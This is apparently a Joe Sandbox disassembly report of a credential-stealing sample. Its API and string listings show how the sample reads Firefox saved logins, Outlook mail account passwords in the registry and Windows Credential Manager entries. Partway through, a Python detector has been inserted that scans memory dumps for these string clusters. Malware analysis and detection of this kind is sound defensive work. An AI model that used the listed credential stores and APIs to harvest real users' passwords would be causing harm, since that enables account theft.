                                                                              • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                            • memset.MSVCRT ref: 0040E5B8
                                                                            • memset.MSVCRT ref: 0040E5CD
                                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                            • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                            • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                            • memset.MSVCRT ref: 0040E6B5
                                                                            • memset.MSVCRT ref: 0040E6CC
                                                                              • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                              • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                            • memset.MSVCRT ref: 0040E736
                                                                            • memset.MSVCRT ref: 0040E74F
                                                                            • sprintf.MSVCRT ref: 0040E76D
                                                                            • sprintf.MSVCRT ref: 0040E788
                                                                            • _strcmpi.MSVCRT ref: 0040E79E
                                                                            • _strcmpi.MSVCRT ref: 0040E7B7
                                                                            • _strcmpi.MSVCRT ref: 0040E7D3
                                                                            • memset.MSVCRT ref: 0040E858
                                                                            • sprintf.MSVCRT ref: 0040E873
                                                                            • _strcmpi.MSVCRT ref: 0040E889
                                                                            • _strcmpi.MSVCRT ref: 0040E8A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                            • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                            • API String ID: 4171719235-3943159138
                                                                            • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                            • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                            • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                            • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                            • GetWindowRect.USER32(?,?), ref: 00410487
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                            • GetDC.USER32 ref: 004104E2
                                                                            • strlen.MSVCRT ref: 00410522
                                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                            • ReleaseDC.USER32(?,?), ref: 00410580
                                                                            • sprintf.MSVCRT ref: 00410640
                                                                            • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                            • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                            • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                            • GetClientRect.USER32(?,?), ref: 004106DD
                                                                            • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                            • GetClientRect.USER32(?,?), ref: 00410737
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                            • String ID: %s:$EDIT$STATIC
                                                                            • API String ID: 1703216249-3046471546
                                                                            • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                            • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                            • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                            • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004024F5
                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                            • _mbscpy.MSVCRT(?,00000000,?,?,?,679D7B60,?,00000000), ref: 00402533
                                                                            • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$QueryValuememset
                                                                            • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                            • API String ID: 168965057-606283353
                                                                            • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                            • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                            • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                            • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                            • memset.MSVCRT ref: 0040128E
                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                            • String ID:
                                                                            • API String ID: 2998058495-0
                                                                            • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                            • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                            • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                            • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                            • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                            • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                            • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp$memcpy
                                                                            • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                            • API String ID: 231171946-2189169393
                                                                            • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                            • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                            • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                            • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                            • API String ID: 633282248-1996832678
                                                                            • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                            • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: sprintf$memset$_mbscpy
                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                            • API String ID: 3402215030-3842416460
                                                                            • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                            • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                            APIs
                                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                            • strlen.MSVCRT ref: 0040F139
                                                                            • strlen.MSVCRT ref: 0040F147
                                                                            • memset.MSVCRT ref: 0040F187
                                                                            • strlen.MSVCRT ref: 0040F196
                                                                            • strlen.MSVCRT ref: 0040F1A4
                                                                            • memset.MSVCRT ref: 0040F1EA
                                                                            • strlen.MSVCRT ref: 0040F1F9
                                                                            • strlen.MSVCRT ref: 0040F207
                                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                            • API String ID: 2003275452-3138536805
                                                                            • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                            • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
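The two function blocks above (the Outlook account registry reader with its POP3/IMAP/SMTP/HTTPMail value names and Password2, and the Firefox profile reader that looks for signons.sqlite, signons.txt and logins.json, loads nss3.dll and sqlite3.dll, and copies hostname, encryptedUsername, encryptedPassword, httpRealm, usernameField and passwordField) give a compact string profile of the credential recovery code bundled into this sample. The following Python is an added example and is not code from the Joe Sandbox report, from Remcos, or from the NirSoft tools it embeds: it scans a byte buffer such as a process memory dump for those string clusters, in both ASCII and UTF-16LE form, and requires several strings per cluster so a single generic word like "hostname" cannot fire on its own. The indicator lists are copied from the String IDs above; the category names, the per-category thresholds and the sample buffers are the author's own choices and are constructed for the demo.

```python
"""
Added example, not part of the sandbox report or the analysed sample:
scan a memory dump for the credential-harvesting string clusters that
this report's disassembly attributes to the embedded password recovery code.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Indicator strings taken from the report's String IDs; category names are ours.
INDICATORS: Dict[str, Tuple[bytes, ...]] = {
    "firefox_logins_json": (
        b"hostname", b"encryptedUsername", b"encryptedPassword",
        b"httpRealm", b"usernameField", b"passwordField", b"logins",
    ),
    "firefox_store_files": (b"logins.json", b"signons.sqlite", b"signons.txt"),
    "nss_sqlite_dlls": (b"nss3.dll", b"sqlite3.dll"),
    "outlook_registry": (
        b"POP3 Server", b"POP3 User Name", b"IMAP Server", b"IMAP User Name",
        b"SMTP Server", b"SMTP Email Address", b"HTTPMail Server", b"Password2",
    ),
    "mail_uri_prefixes": (b"imap://%s", b"smtp://%s", b"mailbox://%s"),
}

# Minimum distinct strings per category before it counts as a hit (assumed
# thresholds, chosen so generic words such as "hostname" do not fire alone).
MIN_HITS: Dict[str, int] = {
    "firefox_logins_json": 4,
    "firefox_store_files": 2,
    "nss_sqlite_dlls": 2,
    "outlook_registry": 3,
    "mail_uri_prefixes": 2,
}


@dataclass
class ScanResult:
    matched: Dict[str, List[str]] = field(default_factory=dict)

    @property
    def categories(self) -> List[str]:
        return sorted(self.matched)

    @property
    def verdict(self) -> str:
        # Browser and mail harvesting together is the profile this report shows.
        if {"firefox_logins_json", "outlook_registry"} <= set(self.matched):
            return "browser+mail credential harvester"
        if self.matched:
            return "partial credential harvester indicators"
        return "no indicators"


def _present(buf: bytes, needle: bytes) -> bool:
    # Match the ASCII form and the UTF-16LE form, since registry value names
    # are often stored as wide strings in the binary.
    wide = needle.decode("ascii").encode("utf-16-le")
    return needle in buf or wide in buf


def scan(buf: bytes) -> ScanResult:
    """Return the indicator categories whose hit count reaches its threshold."""
    result = ScanResult()
    for category, needles in INDICATORS.items():
        hits = [n.decode("ascii") for n in needles if _present(buf, n)]
        if len(hits) >= MIN_HITS[category]:
            result.matched[category] = hits
    return result


# Constructed sample buffers (not real data from the report's sample).
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"hostname\x00encryptedUsername\x00encryptedPassword\x00httpRealm\x00"
    + b"logins.json\x00signons.sqlite\x00nss3.dll\x00sqlite3.dll\x00"
    + b"imap://%s\x00smtp://%s\x00mailbox://%s\x00"
    + "POP3 Server\x00SMTP Server\x00Password2\x00".encode("utf-16-le")
    + b"\x00" * 16
)
BENIGN_DUMP = b"hostname\x00logins\x00" + b"A" * 64  # generic words only


if __name__ == "__main__":
    r = scan(SAMPLE_DUMP)
    print(r.verdict, r.categories)
```

Run it against a raw process dump (for example the 0000000B.00000002 region listed as the memory dump source above) with `scan(open(path, "rb").read())`; a hit on both the Firefox and the Outlook clusters in a process that is not a browser or a mail client is the condition worth alerting on, while a hit on the file names alone also occurs in legitimate password managers and backup tools.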
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C3F7
                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                            • strrchr.MSVCRT ref: 0040C417
                                                                            • _mbscat.MSVCRT ref: 0040C431
                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                            • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                            • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                            • API String ID: 1012775001-1343505058
                                                                            • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                            • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2449869053-232097475
                                                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                            APIs
                                                                            • sprintf.MSVCRT ref: 0040957B
                                                                            • LoadMenuA.USER32(?,?), ref: 00409589
                                                                              • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                              • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                              • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                              • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                            • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                            • sprintf.MSVCRT ref: 004095EB
                                                                            • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                            • memset.MSVCRT ref: 0040961C
                                                                            • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                            • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                            • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                            • String ID: caption$dialog_%d$menu_%d
                                                                            • API String ID: 3259144588-3822380221
                                                                            • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                            • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                            • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                            • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                            APIs
                                                                              • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                            • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                            • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                            • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                            • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                            • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                            • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                            • API String ID: 2449869053-4258758744
                                                                            • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                            • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                            • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                            • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                            APIs
                                                                            • wcsstr.MSVCRT ref: 0040426A
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                            • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                            • strchr.MSVCRT ref: 004042F6
                                                                            • strlen.MSVCRT ref: 0040430A
                                                                            • sprintf.MSVCRT ref: 0040432B
                                                                            • strchr.MSVCRT ref: 0040433C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                            • String ID: %s@gmail.com$www.google.com
                                                                            • API String ID: 3866421160-4070641962
                                                                            • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                            • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
